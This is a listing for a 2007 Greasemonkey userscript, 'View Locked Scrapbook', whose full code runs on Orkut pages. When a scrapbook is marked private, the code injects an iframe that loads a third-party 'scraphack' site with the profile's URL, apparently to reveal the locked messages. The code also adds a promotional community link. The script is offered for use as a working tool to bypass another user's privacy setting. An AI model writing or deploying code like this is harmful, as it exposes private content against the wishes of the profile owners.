View Locked Scrapbook

By Devilsworkshop Last update Dec 17, 2007 — Installed 158,636 times. Daily Installs: 251, 227, 227, 200, 189, 173, 158, 237, 182, 252, 203, 211, 230, 212, 238, 192, 210, 224, 145, 150, 201, 210, 147, 228, 218, 193, 161, 148, 167, 137, 168, 195
// ==UserScript==
// @author            D3
//@Credits        Rodrigo Lacerda [http://www.orkut.com/Profile.aspx?uid=1707700121110059969] 
// @name           View Locked Scrapbook
// @namespace      http://www.ougarena.com
// @description    View Locked Scrapbook
// @include        http://www.orkut.com/*
// ==/UserScript==

/* Credits to Rodrigo Lacerda [http://www.orkut.com/Profile.aspx?uid=1707700121110059969]  for making that site.. and last part of this script */
if((document.getElementsByTagName('div').item(10).innerHTML.indexOf('This content has been set to private by the profile owner.')>=0) || (document.getElementsByTagName('div').item(10).innerHTML.indexOf('Este conteúdo foi definido como particular pelo dono do perfil.')>=0))
{
document.body.innerHTML+="<br><h1>Join <a href='http:\/\/www.orkut.com\/Community.aspx?cmm=25675519'>Orkut Plus!</a></h1><br>"+"<iframe width='800' height='600'></iframe>"
window[0].location='http://scraphack.cspbrasil.com/ViewScraps.php?uid='+encodeURIComponent(location.href);
}